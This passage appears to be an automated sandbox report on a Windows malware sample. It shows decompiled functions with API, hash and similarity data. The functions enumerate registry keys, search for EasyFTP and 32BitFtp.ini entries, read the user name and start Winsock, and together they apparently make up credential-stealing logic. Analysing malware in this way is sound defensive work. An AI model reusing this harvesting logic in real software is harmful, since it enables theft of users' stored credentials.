				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				char _v2072;
				long _t24;
				long _t25;
				intOrPtr _t32;

				_t24 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t25 = _t24;
				if(_t25 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_t32 = E00401C8E(_a8, _a12,  &_v2064,  &_v2072);
						_v2068 = _t32;
						if(_t32 != 0 && _v2072 != 0) {
							E00403DF7(_a4, _v2068, _v2072, 0xbeef0000);
						}
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t25;
			}

0x00407411
0x00407416
0x00407418
0x0040741e
0x00407425
0x00407425
0x0040744c
0x00000000
0x00000000
0x00407464
0x00407469
0x00407471
0x00407490
0x00407490
0x0040749b
0x004074a0
0x004074a0
0x00000000
0x004074a8
0x004074ae

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407411
RegEnumValueA.ADVAPI32 ref: 00407445
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004074A8

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID:
API String ID: 4012628704-0
Opcode ID: 4f5a2dbe14de2fb53bb9454d8bfbf7431c0efea47777903af28ee8858ffe2408
Instruction ID: 225cf3d4d1326567d8f11672761244bf4029b44a97f31c33bb7786e48f251d91
Opcode Fuzzy Hash: 4f5a2dbe14de2fb53bb9454d8bfbf7431c0efea47777903af28ee8858ffe2408
Instruction Fuzzy Hash: 8F111C7290410CBADF219F90CC42BDDBBB9BF04304F14C0B6B614B51A1DB79ABA59F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040F439, Relevance: 4.6, APIs: 3, Instructions: 50
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F439(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, CHAR* _a16) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				long _t22;
				long _t23;
				void* _t35;

				_t35 = __ecx;
				_t22 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t23 = _t22;
				if(_t23 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D69(E00401D69(E00401D15(_a12, "\\"),  &_v2064), _a16);
						E0040F39C(_t35, _a4, _a8, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t23;
			}

0x0040f439
0x0040f44c
0x0040f451
0x0040f453
0x0040f459
0x0040f460
0x0040f460
0x0040f487
0x00000000
0x00000000
0x0040f4b0
0x0040f4c2
0x0040f4cd
0x0040f4d2
0x0040f4d2
0x00000000
0x0040f4da
0x0040f4e0

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F44C
RegEnumKeyExA.ADVAPI32 ref: 0040F480
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F4DA

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: aa8a74240db538a80540b88ad57e6850934c841f64fe9afdf995eb129e139c62
Instruction ID: 735606c21c6a6d191ae9bd649b31301a7bdc0d160cf88c939fc3181304d95fd7
Opcode Fuzzy Hash: aa8a74240db538a80540b88ad57e6850934c841f64fe9afdf995eb129e139c62
Instruction Fuzzy Hash: 9411127590010CBADF21AFA1CC02FEE7B79BF04304F1080B6BA15B55E1DB79AA959F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040F39C, Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F39C(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				long _t21;
				long _t22;
				void* _t33;

				_t33 = __ecx;
				_t21 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t22 = _t21;
				if(_t22 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D69(E00401D15(_a12, "\\"),  &_v2064);
						E0040F207(_t33, _a4, _a8, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t22;
			}

0x0040f39c
0x0040f3af
0x0040f3b4
0x0040f3b6
0x0040f3b8
0x0040f3bf
0x0040f3bf
0x0040f3e6
0x00000000
0x00000000
0x0040f406
0x0040f418
0x0040f423
0x0040f428
0x0040f428
0x00000000
0x0040f430
0x0040f436

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F3AF
RegEnumKeyExA.ADVAPI32 ref: 0040F3DF
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F430

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: 998927d36561a2003baa7c702cc51bfb4aaa151aaf9bee54d6bd3a387bdb2818
Instruction ID: ef60cf3e78cb170a6f642b347f899af58aef4bd76c3f3cdf9285c2581eedf16e
Opcode Fuzzy Hash: 998927d36561a2003baa7c702cc51bfb4aaa151aaf9bee54d6bd3a387bdb2818
Instruction Fuzzy Hash: 5F01217690010CBADF21AF91CC42FEE7B79BF04304F1080B6BA14B51E1DB79AA959F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBD9, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CBD9(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char* _v12;
				char* _t11;
				char* _t12;
				char* _t14;
				void* _t20;
				void* _t21;

				_t21 = __edx;
				_t20 = __ecx;
				_v8 = E0040150D(_a4, 0x43, 0);
				_t11 = E00401C8E(0x80000002, "SOFTWARE\\Classes\\TypeLib\\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\\1.2\\0\\win32", 0, 0); // executed
				_t12 = _t11;
				if(_t12 != 0) {
					_v12 = _t12;
					_t14 = StrStrIA(_v12, "EasyFTP");
					_t23 = _t14;
					if(_t14 != 0) {
						E00403F86(_t20, _a4, E0040234A(_t23, _v12), 0, 0xbeef0000, E0040CB8D);
						E004017D5(_t17);
					}
					E004017D5(_v12);
				}
				return E00401553(_t21, _t23, _a4, _v8);
			}

0x0040cbd9
0x0040cbd9
0x0040cbeb
0x0040cbfc
0x0040cc01
0x0040cc03
0x0040cc05
0x0040cc10
0x0040cc15
0x0040cc17
0x0040cc32
0x0040cc37
0x0040cc37
0x0040cc3f
0x0040cc3f
0x0040cc50

APIs

StrStrIA.SHLWAPI(?,EasyFTP,80000002,SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32,00000000,00000000), ref: 0040CC10

Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

EasyFTP, xrefs: 0040CC08
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040CBF2

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
API String ID: 1884169789-2776585315
Opcode ID: 63f6b9c7b0b6ac1dc6c00c8d6c22b0c76bec622ec5f32ca3d0dd6b1c66588ab7
Instruction ID: 833bec486d2f115b47918bfa30de8f6535c6fd2c173ee2e59642ce28720d77dd
Opcode Fuzzy Hash: 63f6b9c7b0b6ac1dc6c00c8d6c22b0c76bec622ec5f32ca3d0dd6b1c66588ab7
Instruction Fuzzy Hash: 6DF06D70A90208BAEF117BA2CC43FAD7D359B10714F20413B7A05781F2EABD9B51D65C

Uniqueness

Uniqueness Score: -1.00%

Function 00401DCE, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401DCE(void* __eflags, signed int _a4) {
				intOrPtr _v8;
				void* _t12;
				intOrPtr _t19;
				intOrPtr* _t21;

				_v8 = E004017EC(0x105);
				if( *0x41446f != 0) {
					_t12 =  *0x41446f(0, _a4, 0, 0, _v8); // executed
					if(_t12 < 0) {
						goto L3;
					}
				} else {
					L3:
					E004017D5(_v8);
					_v8 = 0;
					_t21 = 0x414473;
					while( *_t21 != 0) {
						_t20 =  *_t21;
						if( *((intOrPtr*)( *_t21 + 4)) != (_a4 & 0xffff7fff)) {
							L7:
							_t21 = _t21 + 4;
							continue;
						} else {
							_t19 = E00401C8E( *_t20, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", _t20 + 8, 0);
							if(_t19 == 0) {
								goto L7;
							} else {
								_v8 = _t19;
							}
						}
						goto L9;
					}
				}
				L9:
				return _v8;
			}

0x00401ddf
0x00401de9
0x00401df9
0x00401e01
0x00000000
0x00000000
0x00401deb
0x00401e03
0x00401e06
0x00401e0b
0x00401e12
0x00401e46
0x00401e19
0x00401e26
0x00401e43
0x00401e43
0x00000000
0x00401e28
0x00401e3a
0x00401e3c
0x00000000
0x00401e3e
0x00401e3e
0x00401e3e
0x00401e3c
0x00000000
0x00401e26
0x00401e46
0x00401e4b
0x00401e50

APIs

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401DF9

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401E2E

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocFolderLocalPath
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 1254228173-2036018995
Opcode ID: adfc9d6224a73f74d039f8ed0ef042fe7e0f9fa600f4b871ee7a2a7eaa3ba91d
Instruction ID: a3ddda74c67e5e51f847a673abce941a0f793803ed09e317935be1dd6252c98b
Opcode Fuzzy Hash: adfc9d6224a73f74d039f8ed0ef042fe7e0f9fa600f4b871ee7a2a7eaa3ba91d
Instruction Fuzzy Hash: 82017136A00205EBDB119B90CC02B9EB7B5AB44314F244177EA01BB1E0E7789B50DB8D

Uniqueness

Uniqueness Score: -1.00%

Function 00407C91, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407C91(void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				int _t11;
				void* _t17;

				_t17 = __edx;
				_v8 = E0040150D(_a4, 0x1d, 0);
				_t11 = GetWindowsDirectoryA( &_v269, 0x104);
				if(_t11 != 0) {
					_t19 = _t11 - 0x104;
					if(_t11 <= 0x104) {
						E00403E4C(_a4, E00401D15( &_v269, "\\32BitFtp.ini"), 0xbeef0000); // executed
						E004017D5(_t14);
					}
				}
				return E00401553(_t17, _t19, _a4, _v8);
			}

0x00407c91
0x00407ca6
0x00407cba
0x00407cbc
0x00407cbe
0x00407cc3
0x00407ce0
0x00407ce5
0x00407ce5
0x00407cc3
0x00407cf6

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407CB5

Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

\32BitFtp.ini, xrefs: 00407CC5

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
String ID: \32BitFtp.ini
API String ID: 2776971706-1260517637
Opcode ID: a84d678b1756394bbe4d235c71b4e519db7788ff0fbbbd9a3c0442819176ca34
Instruction ID: 2195aeeb4991f3a6115ba96b76fa21cbd29fe7e13ab62e4599c67b56f028ae1e
Opcode Fuzzy Hash: a84d678b1756394bbe4d235c71b4e519db7788ff0fbbbd9a3c0442819176ca34
Instruction Fuzzy Hash: 91F08270900108BAEF11BAA1CC42FDD7A69AB40748F104037B605B51E2EAB8AA809A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00410C10, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410C10(signed int __eax, void* __ecx, signed int __edx, void* __eflags) {
				char _v8;
				void* _t6;
				signed int _t8;
				int _t9;
				signed int _t10;
				void* _t11;
				void* _t12;

				_t17 = __eflags;
				_t13 = __ecx;
				_t16 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
				_v8 = 0;
				_t6 = E00410B60( &_v8, __ecx, __edx ^ __eax ^ __eax ^ __edx ^ __eax, __eflags,  &_v8); // executed
				_t8 = E00402D9C(E00410331(_t6, _t16), "samantha"); // executed
				_t9 = E004105CE(_t8, _t13, _t16, _t17); // executed
				if( *0x414616 != 0) {
					_t19 =  *0x414409;
					if( *0x414409 != 0) {
						_t9 = RevertToSelf();
					}
					 *0x4140fe = 0x80000001; // executed
				}
				_t10 = E0041088B(_t9, _t16); // executed
				_t11 = E0041098D(_t10, _t13, _t16); // executed
				_t12 = E004106D5(_t11, _t16, _t19); // executed
				return _t12;
			}

0x00410c10
0x00410c10
0x00410c1a
0x00410c1c
0x00410c27
0x00410c36
0x00410c3b
0x00410c47
0x00410c49
0x00410c50
0x00410c52
0x00410c52
0x00410c58
0x00410c58
0x00410c62
0x00410c67
0x00410c6c
0x00410c72

APIs

Part of subcall function 00410B60: OleInitialize.OLE32(00000000), ref: 00410B6E
Part of subcall function 00410B60: GetUserNameA.ADVAPI32(00000101,00000101), ref: 00410BC1

RevertToSelf.ADVAPI32(samantha,00000000), ref: 00410C52

Strings

samantha, xrefs: 00410C31

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InitializeNameRevertSelfUser
String ID: samantha
API String ID: 1709315701-1704246511
Opcode ID: 2bbb22e90b323666dd271b49417a46309c84282a46e7ea38e24229a769747b2c
Instruction ID: ba436f915b5ba33af829729ff840d4ee844fee4bebf450b7f9e819facd392308
Opcode Fuzzy Hash: 2bbb22e90b323666dd271b49417a46309c84282a46e7ea38e24229a769747b2c
Instruction Fuzzy Hash: C2E0ED74A1020897D724FBF7994A7CE36A65B8431CF14813B7410922E2EBFC46D5CAAE

Uniqueness

Uniqueness Score: -1.00%

Function 004023F5, Relevance: 3.0, APIs: 2, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004023F5(CHAR* _a4, _Unknown_base(*)()** _a8) {
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t10;
				CHAR* _t12;
				_Unknown_base(*)()** _t13;

				_t4 = LoadLibraryA(_a4); // executed
				_t5 = _t4;
				if(_t5 != 0) {
					_t12 = _a4;
					_t10 = _t5;
					_t13 = _a8;
					while(1) {
						asm("cld");
						asm("repne scasb");
						if( *_t12 == 0) {
							break;
						}
						_t8 = GetProcAddress(_t10, _t12); // executed
						_t9 = _t8;
						if(_t9 != 0) {
							 *_t13 = _t9;
							_t13 = _t13 + 4;
							continue;
						} else {
							return _t9;
						}
						goto L8;
					}
					return 1;
				} else {
					return _t5;
				}
				L8:
			}

0x004023fe
0x00402404
0x00402406
0x0040240f
0x00402413
0x00402416
0x00402419
0x0040241b
0x00402422
0x00402428
0x00000000
0x00000000
0x0040242c
0x00402431
0x00402433
0x0040243c
0x0040243e
0x00000000
0x00402439
0x00402439
0x00402439
0x00000000
0x00402433
0x0040244c
0x0040240c
0x0040240c
0x0040240c
0x00000000

APIs

LoadLibraryA.KERNEL32(004143E1,?,?,?,?,0040245E,ole32.dll,004143E1,00410B78), ref: 004023FE
GetProcAddress.KERNEL32(00000000,004143E1), ref: 0040242C

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 53f7fb14295c34ad7408fa00433a83a28b95298002fe2d2f9c03246ce798e358
Instruction ID: 63647a6b9d78679d1f5e0a50425ec40e01c9d34892c3e944a590a543cd3e3713
Opcode Fuzzy Hash: 53f7fb14295c34ad7408fa00433a83a28b95298002fe2d2f9c03246ce798e358
Instruction Fuzzy Hash: 7BF0B47321401416D7105A39EC8599B6B88D7E3378B105137F916B72C1E1BDDD85C3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00401E53, Relevance: 3.0, APIs: 2, Instructions: 31
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401E53(CHAR* _a4) {
				char* _t4;
				void* _t6;
				void* _t11;

				_t4 = _a4;
				if(_t4 == 0 ||  *_t4 == 0) {
					return 0;
				} else {
					_t6 = CreateFileA(_a4, 0x80, 0, 0, 3, 0, 0); // executed
					_t11 = _t6 + 1;
					if(_t11 != 0) {
						CloseHandle(_t11 - 1);
						return 1;
					}
					return 0;
				}
			}

0x00401e5a
0x00401e5c
0x00401e6a
0x00401e6d
0x00401e7f
0x00401e88
0x00401e89
0x00401e8d
0x00000000
0x00401e92
0x00401e99
0x00401e99

APIs

CreateFileA.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401E7F
CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401E8D

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: d52d746dd5efc15e64718a95c802bffaa35cae3bdf8338a1f0761341ce0fad8c
Instruction ID: 3c78a73ec376b71f213996ba39f05dc87e0add78c32be09080ce482926b503b4
Opcode Fuzzy Hash: d52d746dd5efc15e64718a95c802bffaa35cae3bdf8338a1f0761341ce0fad8c
Instruction Fuzzy Hash: B2E04F7239030437FB311679DC83F5A3A88A711B98F544532B641BD2D2E5FDEC80469C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E5CB, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040E5CB(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				CHAR* _v8;
				char _v12;

				if( *0x414441 != 0) {
					_v8 = E004017EC(0x105);
					_v12 = 0x104;
					 *0x414441(_a8, _a8, _v8,  &_v12); // executed
					if(lstrlenA(_v8) > 3) {
						E00404131(_a4, _v8, ".xml", 0xbeef0000);
					}
					return E004017D5(_v8);
				} else {
					return __eax;
				}
			}

0x0040e5d8
0x0040e5e8
0x0040e5eb
0x0040e5ff
0x0040e610
0x0040e622
0x0040e622
0x0040e630
0x0040e5db
0x0040e5db
0x0040e5db

APIs

lstrlenA.KERNEL32(?), ref: 0040E608

Strings

.xml, xrefs: 0040E617

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen
String ID: .xml
API String ID: 1659193697-2937849440
Opcode ID: 90b6cacf0cd7078945c80df2fcfd99e66fb401e0d4aadcf75266aa938aa2822d
Instruction ID: 5a1537d95f9c1f419a8a440fa280918d6c9dc7d515ed36f1139c0294ba86a765
Opcode Fuzzy Hash: 90b6cacf0cd7078945c80df2fcfd99e66fb401e0d4aadcf75266aa938aa2822d
Instruction Fuzzy Hash: 35F03A3590010CFBCF11EF91CC46ECDBB75AB54318F208166B550B51B0D77A9BA0EB49

Uniqueness

Uniqueness Score: -1.00%

Function 00401ED7, Relevance: 3.0, APIs: 2, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401ED7(CHAR* _a4) {
				CHAR* _v8;
				long _t8;
				long _t10;
				long _t11;

				_t8 = ExpandEnvironmentStringsA(_a4, 0, 0);
				if(_t8 != 0) {
					_v8 = E004017EC(_t8);
					_t10 = _t8;
					_t11 = ExpandEnvironmentStringsA(_a4, _v8, _t10); // executed
					if(_t11 != 0) {
						return _v8;
					}
					E004017D5(_v8);
					return 0;
				}
				return _t8;
			}

0x00401ee9
0x00401eeb
0x00401ef4
0x00401ef7
0x00401eff
0x00401f06
0x00000000
0x00401f14
0x00401f0b
0x00000000
0x00401f10
0x00401f18

APIs

ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000), ref: 00401EE4

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

ExpandEnvironmentStringsA.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 00401EFF

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentExpandLocalStrings$AllocFree
String ID:
API String ID: 2376306162-0
Opcode ID: 1d919932fb61780aa28a7e07a86efcfdc9d920ef220753925131e72dd29416f2
Instruction ID: 7f4f1e0e00ab06bac919c0edf942330a42c35112189e7af74651cb16d4d644b8
Opcode Fuzzy Hash: 1d919932fb61780aa28a7e07a86efcfdc9d920ef220753925131e72dd29416f2
Instruction Fuzzy Hash: E9E01B7150410ABADF11AA71DD02FAD75689B50358F1001367514F51F1FB7D9F50A79C

Uniqueness

Uniqueness Score: -1.00%

Function 004013C2, Relevance: 1.5, APIs: 1, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004013C2(void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t10;
				long _t13;
				void* _t15;

				_t15 = _a8;
				while(1) {
					_t10 = WriteFile(_a4, _t15, _a12,  &_v8, 0); // executed
					if(_t10 == 0 || _v8 == 0) {
						break;
					}
					_t13 = _v8;
					_t15 = _t15 + _t13;
					_t7 =  &_a12;
					 *_t7 = _a12 - _t13;
					if( *_t7 != 0) {
						continue;
					} else {
						return 1;
					}
					L6:
				}
				return 0;
				goto L6;
			}

0x004013c9
0x004013cc
0x004013d9
0x004013e0
0x00000000
0x00000000
0x004013ef
0x004013f2
0x004013f4
0x004013f4
0x004013f7
0x00000000
0x004013f9
0x00401400
0x00401400
0x00000000
0x004013f7
0x004013ec
0x00000000

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004013D9

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6e3ca6acbfabcd83ac8cff14c77b57197338b33358a0f62b155115e065e0c992
Instruction ID: b2a8a1a4098528e9a7980f2ebc5f3a58106d20ece59f8725bb207e7cc5dc22b0
Opcode Fuzzy Hash: 6e3ca6acbfabcd83ac8cff14c77b57197338b33358a0f62b155115e065e0c992
Instruction Fuzzy Hash: 7AE03032910219EBDF10DEA4CC41BDF77A89B10358F044126BD14E61D0E6B5DB50C794

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00401000(signed int __eax, signed int __edx, intOrPtr _a4) {

				_push(_a4);
				_push(1);
				_push(0); // executed
				L00410DB8(); // executed
				return __eax ^ __edx ^ __eax;
			}

0x00401009
0x0040100c
0x0040100e
0x00401010
0x00401016

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,0040202B,?,?,?,?,00410BE4), ref: 00401010

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 774a49e7147280b3b20938a5452805c50a6a17f2c45d990b9c3d6a4dcf1db92f
Instruction ID: dea821b72ffdd4c679baa99983bcdd127a299b87b73cb077d53c3cab1c2398ee
Opcode Fuzzy Hash: 774a49e7147280b3b20938a5452805c50a6a17f2c45d990b9c3d6a4dcf1db92f
Instruction Fuzzy Hash: 05C092367543082AFB80EEF35C03FDB768B4B91B48F00C435BB04990C5E8F5E49291A9

Uniqueness

Uniqueness Score: -1.00%

Function 00403DDB, Relevance: 1.5, APIs: 1, Instructions: 9
networkCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00403DDB() {
				char _v404;
				char* _t2;

				_t2 =  &_v404;
				_push(_t2);
				_push(0x101); // executed
				L00410E90(); // executed
				return _t2;
			}

0x00403de4
0x00403dea
0x00403deb
0x00403df0
0x00403df6

APIs

WSAStartup.WSOCK32(00000101,?,?,004105E3), ref: 00403DF0

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 788b9be6feae9eeb2305b67f880ac4d482cd380d992e23d7d77878d23df068a8
Instruction ID: b39ddb2bae58422bad9ef1c852a27b00e881b3ffe9b04fce0b25c26bea8dbb9f
Opcode Fuzzy Hash: 788b9be6feae9eeb2305b67f880ac4d482cd380d992e23d7d77878d23df068a8
Instruction Fuzzy Hash: CBB092326206082AE660A2968C43AE6729D5744708F8401A52B59D12C2EAE5AA9045FA

Uniqueness

Uniqueness Score: -1.00%

Function 00410C73, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 00410C80

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: c0b8540e317ed233f6ae623aefb25d1a025ca87b903b635d51881dad735b25c2
Instruction ID: a53dbb4ca493b7ef7e200f8e6b71ae19aff1122ae8d0357d8058c1ff4ff95ae7
Opcode Fuzzy Hash: c0b8540e317ed233f6ae623aefb25d1a025ca87b903b635d51881dad735b25c2
Instruction Fuzzy Hash: C7A00122B5420956E788FAB31D0A79A00830B81609F25CD2A76149A48BEDF9A0D2045D

Uniqueness

Uniqueness Score: -1.00%

Function 004017D5, Relevance: 1.3, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004017D5(void* _a4) {

				if(_a4 != 0) {
					LocalFree(_a4); // executed
				}
				return 0;
			}

0x004017dc
0x004017e1
0x004017e1
0x004017e9

APIs

LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: fb9b7f913ff500385d027358800d845580eb72bb67fe42432893e3097370cae2
Instruction ID: 6fbac20c93ee8dcf72c2f2e582e4e5176c4e840c565eb3d7ca7bd60efa235b74
Opcode Fuzzy Hash: fb9b7f913ff500385d027358800d845580eb72bb67fe42432893e3097370cae2
